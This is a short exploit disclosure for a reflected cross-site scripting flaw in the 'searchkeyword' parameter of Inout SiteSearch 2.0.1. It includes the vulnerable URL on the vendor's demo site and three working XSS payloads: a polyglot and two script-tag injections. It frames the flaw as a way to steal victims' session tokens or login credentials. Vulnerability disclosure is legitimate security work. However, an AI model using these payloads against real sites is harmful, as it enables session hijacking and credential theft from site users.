Inout SiteSearch version 2.0.1 suffers from a cross site scripting vulnerability.
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ C r a C k E r ββ
ββ T H E C R A C K O F E T E R N A L M I G H T ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββ From The Ashes and Dust Rises An Unimaginable crack.... βββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ [ Exploits ] ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: Author : CraCkEr β β :
β Website : inoutscripts.com β β β
β Vendor : Inout Scripts β β β
β Software : Inout SiteSearch 2.0.1 β β Inout SiteSearch is a premium script β
β Vuln Type: Cross Site Scripting Reflected β β that allows you to add a site β
β Method : GET β β search feature β
β Impact : Manipulate the content of β β β
β the site β β β
ββββββββββββββββββββββββββββββββββββββββββββββ βββββββββββββββββββββββββββββββββββββββββββ
β B4nks-NET irc.b4nks.tk #unix ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: :
β Release Notes: β
β βββββββββββββ β
β β
β The attacker can send to victim a link containing a malicious URL in an email or β
β instant message can perform a wide variety of actions, such as stealing the victim's β
β session token or login credentials β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL
Phr33k , NK, GoldenX, Wehla, Cap, DarkCatSpace, R0ot, KnG, Centerk, chamanwal
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, ix7
CryptoJob (Twitter) twitter.com/CryptozJob
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ Β© CraCkEr 2022 ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
GET parameter 'searchkeyword' is vulnerable to XSS
http://inout-sitesearch.demo.inoutscripts.net/index.php/search/result?searchkeyword=[XSS]
Some XSS Payloads Reflected
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
[-] Done